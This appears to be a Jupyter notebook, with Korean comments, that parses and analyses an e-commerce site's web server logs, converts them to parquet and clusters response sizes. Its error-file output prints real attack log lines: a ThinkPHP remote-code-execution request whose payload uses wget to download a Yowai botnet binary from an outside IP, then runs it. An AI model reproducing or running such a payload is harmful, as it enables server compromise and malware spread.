('5.106.77.122', '26/Jan/2019:15:03:23 +0330', 'GET', '/image/33776?name=tf540-33.jpg&wh=max', '200', '50019', 'https://www.zanbil.ir/m/product/33776/64504/%DB%8C%D8%AE%DA%86%D8%A7%D9%84-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1-%D8%A8%D8%A7%D9%84%D8%A7-%D8%A7%D9%84-%D8%AC%DB%8C-%D9%85%D8%AF%D9%84-TF540TS', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G532F Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36')


9819481it [02:17, 83348.96it/s]

('77.104.99.66', '26/Jan/2019:16:21:02 +0330', 'GET', '/image/187/article/100x100', '200', '6999', 'https://www.zanbil.ir/browse/sewing-machine/%DA%86%D8%B1%D8%AE-%D8%AE%DB%8C%D8%A7%D8%B7%DB%8C', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


10012599it [02:20, 37159.99it/s]

('2.178.168.181', '26/Jan/2019:17:52:28 +0330', 'GET', '/image/57553/productModel/150x150', '200', '3632', 'https://www.zanbil.ir/filter/p6%2Cb2%2Cstexists', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


10218409it [02:22, 94747.29it/s]

('151.241.203.59', '26/Jan/2019:19:18:42 +0330', 'GET', '/image/8868/specialSale?role=e2', '200', '11', 'https://www.zanbil.ir/filter/b32', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


10365152it [02:24, 71605.74it/s]


CPU times: user 2min 5s, sys: 8.62 s, total: 2min 13s
Wall time: 2min 25s


## Error File Check

In [11]:
!wc errors.txt

   314   7867 236189 errors.txt


In [13]:
with open('errors.txt') as err:
    for e in err:
        print(e)

('178.47.232.191 - - [22/Jan/2019:04:54:22 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list index out of range')

('188.19.139.184 - - [22/Jan/2019:06:06:53 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list index out of range')

('42.112.163.67 - - [22/Jan/2019:06:36:36 +0330] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= \'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86\' HTTP/1.1" 400 166 "-" "Yowai/2.0" "-"\n', 'list 

- 314개의 정규표현식에 맞지 않는 line이 있음
- 따로 처리하진 않음

# Parquet File Check

In [14]:
%time logs_df = pd.read_parquet('parquet_dir/')

CPU times: user 12.5 s, sys: 4.08 s, total: 16.6 s
Wall time: 11.9 s


In [15]:
!du -sh parquet_dir/

257M	parquet_dir/


- 모든 parquet파일을 읽는데 11.9초가 걸림
- 파일 용량이 3.3G -> 257M로 약 120% 정도 감소

In [17]:
logs_df.info(null_counts=True)

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10364838 entries, 0 to 10364837
Data columns (total 8 columns):
 #   Column     Non-Null Count     Dtype 
---  ------     --------------     ----- 
 0   client     10364838 non-null  object
 1   datetime   10364838 non-null  object
 2   method     10364838 non-null  object
 3   request    10364838 non-null  object
 4   status     10364838 non-null  object
 5   size       10364838 non-null  object
 6   url        10364838 non-null  object
 7   useragent  10364838 non-null  object
dtypes: object(8)
memory usage: 632.6+ MB


- 약 1036만개의 행이 존재
- 메모리는 0.6G정도 사용
- 데이터를 불러왔으므로 이제 `parquet_dir` 경로를 삭제 후 데이터타입을 변경하여 메모리 절약 시도

In [18]:
%rm -r parquet_dir/

In [19]:
logs_df['client'] = logs_df['client'].astype('category')
logs_df['datetime'] = pd.to_datetime(logs_df['datetime'], format='%d/%b/%Y:%H:%M:%S %z')
logs_df['method'] = logs_df['method'].astype('category')
logs_df['size'] = logs_df['size'].astype('int32')
logs_df['status'] = logs_df['status'].astype('int32')
logs_df['url'] = logs_df['url'].astype('category')
logs_df['useragent'] = logs_df['useragent'].astype('category')

In [20]:
logs_df.info(null_counts=True)

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10364838 entries, 0 to 10364837
Data columns (total 8 columns):
 #   Column     Non-Null Count     Dtype                                
---  ------     --------------     -----                                
 0   client     10364838 non-null  category                             
 1   datetime   10364838 non-null  datetime64[ns, pytz.FixedOffset(210)]
 2   method     10364838 non-null  category                             
 3   request    10364838 non-null  object                               
 4   status     10364838 non-null  int32                                
 5   size       10364838 non-null  int32                                
 6   url        10364838 non-null  category                             
 7   useragent  10364838 non-null  category                             
dtypes: category(4), datetime64[ns, pytz.FixedOffset(210)](1), int32(2), object(1)
memory usage: 365.2+ MB


- 데이터프레임에 할당된 메모리가 절반정도 감소

In [21]:
%time logs_df.to_parquet('logs_df.parquet')

CPU times: user 5.3 s, sys: 1.34 s, total: 6.63 s
Wall time: 6.38 s


- 이를 최종 parquet 파일로 저장

In [22]:
!ls -lshS

total 258M
258M -rw-r--r-- 1 root root 258M Jul 19 06:16 logs_df.parquet
236K -rw-r--r-- 1 root root 231K Jul 19 05:56 errors.txt
4.0K drwx------ 6 root root 4.0K Jul 19 05:25 drive
4.0K drwxr-xr-x 1 root root 4.0K Jul 15 13:38 sample_data


In [23]:
%time logs_df = pd.read_parquet('logs_df.parquet')

CPU times: user 5.41 s, sys: 1.63 s, total: 7.04 s
Wall time: 5.66 s


- 11.9초 -> 5.66 약 절반정도 감소

## Logfile Dataframe

In [26]:
logs_df.shape

(10364838, 8)

In [27]:
logs_df

client  ...                                          useragent
0          37.152.163.59  ...  Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7....
1          77.245.233.52  ...  Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
2          37.27.128.139  ...  Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.3...
3          77.245.233.52  ...  Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
4          77.245.233.52  ...  Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20...
...                  ...  ...                                                ...
10364833  86.104.110.254  ...  Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like M...
10364834    65.49.68.192  ...  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:6...
10364835    65.49.68.192  ...  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:6...
10364836  46.209.107.210  ...  Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.3...
10364837    5.125.250.23  ...  Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build...

[10364838 rows x 8 columns]

## Analysis

In [ ]:
from sklearn.cluster import KMeans
k = 5
kmeans = KMeans(k)

- Kmeans Clustering을 사용하여 여러 기술통계량을 살펴봄

### size

In [29]:
%time kmeans.fit(logs_df[['size']])

CPU times: user 1min 12s, sys: 2.66 s, total: 1min 15s
Wall time: 1min 14s


KMeans(algorithm='auto', copy_x=True, init='k-means++', max_iter=300,
       n_clusters=5, n_init=10, n_jobs=None, precompute_distances='auto',
       random_state=None, tol=0.0001, verbose=0)

In [30]:
sorted(kmeans.cluster_centers_.round(0).flatten())

[3576.0, 27714.0, 73821.0, 191105.0, 549767.0]

In [31]:
cluster_df = logs_df.groupby(kmeans.labels_)['size'].describe().sort_values('mean').reset_index(drop=True)

In [34]:
cluster_df.style.background_gradient(subset=['count'], cmap='cividis')\
.format({'mean': '{:,.0f}','count': '{:,.0f}'})

- 첫번째 cluster에는 약 8백만개의 line이 있음, 평균 사이즈는 3,576
- 다른 기술통계량에 대해서도 나와있음

In [40]:
import plotly.express as px
fig = px.scatter(cluster_df,
                 x='mean', y='count',
                 size=[5]*len(cluster_df),
                 size_max=15,
                 log_y=True,
                 hover_data=['min', 'max', 'std'],
                 title=f'<b>size 분포 ({k} clusters).\
                 </b><br>각 점은 cluster의 평균 size를 나타냄',
                 labels={'mean': '평균 size (bytes)',
                         'count': '해당 클러스터에 포함된 line 수'},)
fig.data[0].hovertemplate = '<b>Average page size (bytes): %{x:,.0f}</b><br><br>Number of pages in cluster: %{y:,.0f}<br><br>min: %{customdata[0]:,.0f}<br>max: %{customdata[1]:,.0f}<br>std: %{customdata[2]:,.0f}<extra></extra>'
fig.layout.font.size = 14
fig.show()

In [47]:
google_organic = logs_df[logs_df['url'].str.contains('google\.com/search')]['url']
google_organic

1611        https://www.google.com/search?q=%D9%85%D8%A7%D...
1694        https://www.google.com/search?client=ms-androi...
5991        https://www.google.com/search?q=%D9%85%D8%B1%D...
6112        https://www.google.com/search?q=%D9%85%D8%B1%D...
11423       https://www.google.com/search?q=%D9%84%D8%A8%D...
                                  ...                        
10359575    http://www.google.com/search?client=ms-android...
10362765    http://www.google.com/search?source=hp&ei=L1NM...
10363703    https://www.google.com/search?ie=UTF-8&client=...
10364068    http://www.google.com/search?q=%D9%82%DB%8C%D9...
10364780    http://www.google.com/search?q=%D9%82%DB%8C%D9...
Name: url, Length: 6041, dtype: category
Categories (103234, object): ['(null)', '-', '/android-app://com.google.android.gm',
                              '/android-app://com.google.android.googlequick..., ...,
                              'https://znbl.ir/static/images/third-party/foo...,
                         

In [48]:
!pip install advertools -q


     |████████████████████████████████| 276kB 2.9MB/s 
     |████████████████████████████████| 256kB 4.8MB/s 
     |████████████████████████████████| 3.1MB 5.4MB/s 
     |████████████████████████████████| 61kB 6.4MB/s 
     |████████████████████████████████| 71kB 6.1MB/s 
     |████████████████████████████████| 3.2MB 18.8MB/s 
     |████████████████████████████████| 256kB 40.3MB/s 
     |████████████████████████████████| 3.2MB 47.6MB/s 
     |████████████████████████████████| 81kB 8.3MB/s 


In [51]:
import advertools as adv
google_url_df = adv.url_to_df(google_organic)
google_url_df.head()

url  ... query_site
0  https://www.google.com/search?q=ماشین‌ظرفشویی&...  ...        NaN
1  https://www.google.com/search?client=ms-androi...  ...        NaN
2  https://www.google.com/search?q=مرکز+فروش+سماو...  ...        NaN
3  https://www.google.com/search?q=مرکز+فروش+سماو...  ...        NaN
4  https://www.google.com/search?q=لباسشویی+ال+جی...  ...        NaN

[5 rows x 71 columns]

- url에 어떤 쿼리가 담겨있는지 분석해주는 라이브러리

In [53]:
google_url_df.rename(columns={col: col.replace('query_', '') for col in google_url_df.columns},
                     inplace=True)
google_url_df.head()

url scheme  ... inlang site
0  https://www.google.com/search?q=ماشین‌ظرفشویی&...  https  ...    NaN  NaN
1  https://www.google.com/search?client=ms-androi...  https  ...    NaN  NaN
2  https://www.google.com/search?q=مرکز+فروش+سماو...  https  ...    NaN  NaN
3  https://www.google.com/search?q=مرکز+فروش+سماو...  https  ...    NaN  NaN
4  https://www.google.com/search?q=لباسشویی+ال+جی...  https  ...    NaN  NaN

[5 rows x 71 columns]

- 컬럼명에 `query_`를 제거

In [55]:
google_url_df.loc[:, 'q':].notna().mean().sort_values(ascending=False)[:30].\
to_frame().rename(columns={0:'%'}).style.format('{:.1%}')


- 어떤 쿼리가 가장 많았는지 확인